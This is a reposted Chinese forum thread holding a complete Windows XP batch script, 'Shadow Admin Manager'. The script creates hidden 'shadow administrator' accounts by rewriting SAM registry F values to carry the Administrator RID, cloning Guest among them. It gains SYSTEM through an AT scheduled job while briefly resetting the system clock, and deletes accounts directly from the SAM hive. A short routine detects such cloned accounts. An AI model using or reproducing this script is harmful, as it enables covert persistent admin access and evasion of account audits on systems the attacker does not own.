[转贴]克隆帐号
http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=35846&highlight=%2A
::SAM.CMD - 2006-11-25 By 赤红十三 @ ph4nt0m
@ECHO OFF
REM Entry point and argument dispatch. Switches: /Add (default), /Del,
REM /Clone [CloneUser], /Check -- see :USAGE. The switch is folded into ACTION
REM and shifted away. A non-empty third argument only occurs when this script
REM has been re-launched by :SU2SYS, in which case control goes to :BEGIN.
IF %1:==: GOTO USAGE
SETLOCAL
REM Short (8.3) path of this script, used on the AT command line in :SU2SYS.
SET CMDFILE=%~S0
IF /I %1==/Add SHIFT
IF /I %1==/Del SET ACTION=DEL&&SHIFT
IF /I %1==/Clone SET ACTION=CLONE %2&&SHIFT&&SHIFT
IF /I %1==/Check SET ACTION=CHECK&&SET CMDFILE=/INTERACTIVE %CMDFILE%
IF NOT %3#==# GOTO BEGIN
REM Check that every external tool this script depends on is found on PATH.
FOR %%I IN (NET.EXE SC.EXE REG.EXE AT.EXE FIND.EXE MORE.COM PING.EXE) DO (
IF "%%~$PATH:I"=="" (
ECHO 程序所依赖的文件 "%%I" 不存在
SET ERROR=程序无法正常运行
)
)
IF DEFINED ERROR GOTO ERROR
REM First run: hand off to :SU2SYS, which re-launches this script through the
REM Schedule service; the second run is the one that touches HKLM\SAM\SAM
REM (access is verified at :BEGIN). The third argument here is not used by :SU2SYS.
2>NUL CALL:SU2SYS %1 %2 /ADD
GOTO :EOF
:BEGIN
REM Second run, re-launched by :SU2SYS. Needs read access to HKLM\SAM\SAM;
REM fall back to the usage text if the query fails.
>NUL 2>NUL REG QUERY HKLM\SAM\SAM||GOTO USAGE
SET REGKEY=HKLM\SAM\SAM\Domains\Account\Users\
IF %3==/DEL GOTO DELUSER
IF %3==/CHECK GOTO CHECK
IF %3==/CLONE GOTO CLONE
REM Default action /Add: arg 1 is UserName, arg 2 is PassWord.
REM If UserName already exists, delete it first.
CALL:DELUSER %1
REM Create the user.
NET USER %1 %2 /ADD
REM Export the relevant registry keys: 000001F4 is the Users key of the
REM built-in Administrator account (RID 0x1F4), Names\UserName is the new
REM account's name entry.
REG EXPORT %REGKEY%000001F4 1F4.REG
REG EXPORT %REGKEY%Names\%1 %1.REG
REM Get the new account's RID: it is the number inside hex(...) on the
REM "@=hex" line of the exported Names entry.
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %1.REG') DO SET RID=%%F
REM Export the new account's Users key data (key name is 00000 followed by the RID).
REG EXPORT %REGKEY%00000%RID% %RID%.REG
REM Build the account's registry data in a file named after the RID.
REM REGKEY:~4 drops the leading "HKLM" so the full hive name can be written.
ECHO Windows Registry Editor Version 5.00>%RID%
ECHO [HKEY_LOCAL_MACHINE%REGKEY:~4%00000%RID%]>>%RID%
REM Carry over the F value from 1F4.REG. TYPE re-writes the export into a
REM plain file named 1F4 -- presumably to change its encoding for FOR /F; confirm.
REM The loop copies the fourth through seventh lines: LINE runs 3..6 and each
REM pass takes the first line after SKIP, then jumps back.
TYPE 1F4.REG>1F4
SET LINE=2
:FKEYLOOP
SET /A LINE+=1
IF %LINE%==7 GOTO ENDFKEY
FOR /F "SKIP=%LINE% DELIMS=" %%F IN (1F4) DO >>%RID% ECHO %%F&&GOTO FKEYLOOP
:ENDFKEY
REM Append the remaining V value (from line 8 of the RID export onward) and the
REM Names key data (from line 3 of the name export onward).
MORE +7 %RID%.REG>>%RID%
MORE +2 %1.REG>>%RID%
REM Delete the user, then re-import its registry data with the replaced F value.
NET USER %1 /DEL
REG IMPORT %RID%
REM Delete the files produced during the process (all written to the current directory).
DEL 1F4 1F4.REG %1.REG %RID% %RID%.REG
GOTO :EOF
:DELUSER
REM Remove account arg 1 directly from the SAM registry keys.
REM Returns immediately (EXIT /B) when no Names entry exists for it.
2>NUL REG EXPORT %REGKEY%Names\%1 %1.REG||EXIT/B
REM The RID is the number inside hex(...) on the "@=hex" line of the export.
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %1.REG') DO SET RID=%%F
REG DELETE %REGKEY%Names\%1 /F
REG DELETE %REGKEY%00000%RID% /F
REM Create and delete the account with NET USER after the raw key deletion;
REM presumably so the SAM re-syncs its own bookkeeping -- TODO confirm.
NET USER %1 /ADD
NET USER %1 /DEL
REM Delete the user's profile directory (XP layout under DOCUME~1).
REM NOTE: the exported name.REG file is not deleted here and stays in the current directory.
IF EXIST %SYSTEMDRIVE%\DOCUME~1\%1\NUL RD /S /Q "%SYSTEMDRIVE%\DOCUME~1\%1"
GOTO :EOF
:CHECK
::Detection routine: lists all SAM accounts and reports shadow administrators (SA).
::Account names containing spaces or other unusual characters are not supported.
::Method: take the relative identifier stored in the F value of every account
::that is not a member of Administrators and compare it with the RIDs of the
::Administrators members; a match on an enabled account is reported as an SA.
COLOR 02
TITLE CHECK SHADOW ADMINISTRATOR
SETLOCAL ENABLEDELAYEDEXPANSION
REM NOTE(review): each ECHO/FINDSTR/DEL triple below appears to print a banner
REM through a temporary file named after the heading; output not verified here.
ECHO >"Account List"
FINDSTR /V \ "Account List" /X 2>NUL
DEL "Account List"
ECHO.
ECHO RID(0x) Account
REM Walk every Names entry: token 8 of the key path is the account name. Each
REM entry is exported to name.REG and its RID read from the "@=hex" line.
FOR /F "TOKENS=8 DELIMS=\" %%F IN ('REG QUERY %REGKEY%Names') DO (
REG EXPORT %REGKEY%Names\%%F %%F.REG>NUL
FOR /F "TOKENS=2 DELIMS=()" %%G IN ('FIND /I "@=HEX" %%F.REG') DO (
ECHO [%%G] [%%F]
REM Split accounts by Administrators membership as reported by NET USER.
REM ADMINS and USERS collect name-plus-RID entries; the comma variable collects admin names.
NET USER %%F|FIND /I "*Administrators">NUL&&SET,=%%F\!,!&&SET ADMINS=%%F%%G !ADMINS!||SET USERS=%%F%%G !USERS!
)
DEL %%F.REG
)
ECHO.
ECHO [%,:~0,-1%]>"Administrators Contains"
FINDSTR /V : "Administrators Contains" /X 2>NUL
DEL "Administrators Contains"
ECHO.
ECHO >"Check Result"
FINDSTR /V \ "Check Result" /X 2>NUL
DEL "Check Result"
ECHO.
REM Compare every admin and non-admin pair. C1FRID is the admin RID rearranged
REM to the byte order used inside the F value; C2RID is the non-admin's own RID.
FOR %%I IN (%ADMINS%) DO (
FOR %%J IN (%USERS%) DO (
SET C1=%%I&&SET C1FRID=!C1:~-2!0!C1:~-3,1!
SET C2=%%J&&SET C2RID=!C2:~-3!
REM Read the F value of the non-admin account as a hex string, token 3 of REG QUERY output.
FOR /F "TOKENS=3" %%K IN ('REG QUERY %REGKEY%00000!C2RID! /V F') DO (SET C2.F=%%K)
REM Match rule: F hex chars 96-99 equal the admin RID and chars 112-113 are 10,
REM which this script uses as the enabled-state test. A match prints both names.
IF /I "!C2.F:~96,4!"=="!C1FRID!" IF "!C2.F:~112,2!"=="10" ECHO [!C2:~0,-3!] ^<==^> [!C1:~0,-3!]
)
)
ECHO.
SET/P=Press [Enter] to exit...&&PAUSE>NUL
GOTO :EOF
:CLONE
::Rewrites the F value of account UN so that it carries the RID of account CU.
::The account to clone must exist, preferably a built-in system account.
::Argument adjustment: two call shapes arrive here (see :USAGE and :SU2SYS).
::Short form: arg 2 is /ADD, arg 4 is the target user, arg 1 the password, CU is Administrator.
::Long form: arg 4 names the account to clone from, arg 1 is the user, arg 2 the password.
IF %2==/ADD (
SET CU=1F4
SET UN=%4
SET PW=%1
) ELSE (
REG EXPORT %REGKEY%Names\%4 %4.REG
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %4.REG') DO SET CU=%%F
SET UN=%1
SET PW=%2
DEL %4.REG
)
::If the specified CLONEUSER does not exist on the system, CLONEUSER falls back to ADMINISTRATOR (RID 1F4).
IF %CU%#==# SET CU=1F4
::Change the password; abort if NET USER fails, e.g. the account does not exist.
NET USER %UN% %PW%||EXIT/B
::Export the account's relative identifier (parsed from the "@=hex" line).
::NOTE: the exported UN.REG file is not deleted and stays in the current directory.
REG EXPORT %REGKEY%Names\%UN% %UN%.REG
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %UN%.REG') DO SET RID=%%F
::Read the user's F value data as a hex string (token 3 of REG QUERY output).
FOR /F "TOKENS=3" %%I IN ('REG QUERY %REGKEY%00000%RID% /V F') DO (SET F_KEY=%%I)
::Write back the modified F value: hex chars 0-95 unchanged, chars 96-99 replaced
::by CU in swapped byte order, chars 100-111 unchanged, chars 112-113 set to 10,
::the rest unchanged. :CHECK reads back exactly these offsets.
REG ADD %REGKEY%00000%RID% /F /V F /T REG_BINARY /D ^
%F_KEY:~0,96%%CU:~1%0%CU:~0,1%%F_KEY:~100,12%10%F_KEY:~114%
GOTO :EOF
:SU2SYS
REM Re-launch this script one minute from now through the Schedule service (AT),
REM presumably so the scheduled run executes as SYSTEM, per the label name.
REM Observable side effects: the Schedule service start type is set to DEMAND and
REM the service started, an AT job is created, and the system clock is briefly
REM moved to the job time and then put back, so timestamps around that moment are skewed.
SET REGKEY=HKLM\SYSTEM\CurrentControlSet\Services\Schedule
REM Remember the service's original Start value so it can be restored at the end.
FOR /F "TOKENS=3" %%L IN ('REG QUERY %REGKEY% /V START^|FIND /I "START"') DO SET SCHESTART=%%L
SC CONFIG Schedule START= DEMAND>NUL
SC START Schedule>NUL
REM Compute the next minute, wrapping 60 to 0 and 24 to 0. The minute's leading
REM zero is stripped first, presumably because SET /A reads a leading 0 as octal.
SET CHour=%TIME:~0,2%
SET CMinute=%TIME:~3,2%
IF %CMinute:~0,1%==0 SET CMinute=%CMinute:~1%
SET /A NMinute=%CMinute%+1
IF %NMinute%==60 SET NMinute=0
IF %NMinute%==0 SET /A CHour+=1
IF %CHour%==24 SET CHour=0
:ATSTATUS
REM Schedule "CMDFILE arg1 arg2 /ACTION" and retry until AT accepts the job.
REM The escaped stderr redirect is passed through to the scheduled command line.
>NUL AT %CHour%:%NMinute% %CMDFILE% %1 %2 /%ACTION% 2^>NUL
IF ERRORLEVEL 1 GOTO ATSTATUS
REM Save the clock, jump it to the job time so the job fires now, wait about a
REM second via PING, then restore the saved time.
SET CTime=%TIME%
ECHO %CHour%:%NMinute%|TIME>NUL
>NUL PING/n 2 0X7F.1
ECHO %CTime%|TIME>NUL
REM Restore the Schedule service's original Start value.
REG ADD %REGKEY% /V START /T REG_DWORD /D %SCHESTART% /F>NUL
GOTO :EOF
:ERROR
REM Print the message set by the dependency check at the top of the script.
ECHO %ERROR%
GOTO :EOF
:USAGE
REM Usage text. Also reached from :BEGIN when HKLM\SAM\SAM cannot be queried.
ECHO.
ECHO Shadow Admin Manager v1.0 For XP By ch0xd
ECHO.
ECHO Usage:
ECHO SAM [/Add] UserName [PassWord]
ECHO /Del UserName
ECHO /Clone [CloneUser] UserName PassWord
ECHO -CloneUser default is Administrator
ECHO /Check
ECHO.
ECHO Example:
ECHO SAM ch0xd$ hIs0k4
ECHO SAM /Del ch0xd$
ECHO SAM /Clone Guest hIs0k4
ECHO SAM /Check
GOTO :EOF 现在的人写批处理都不老实啊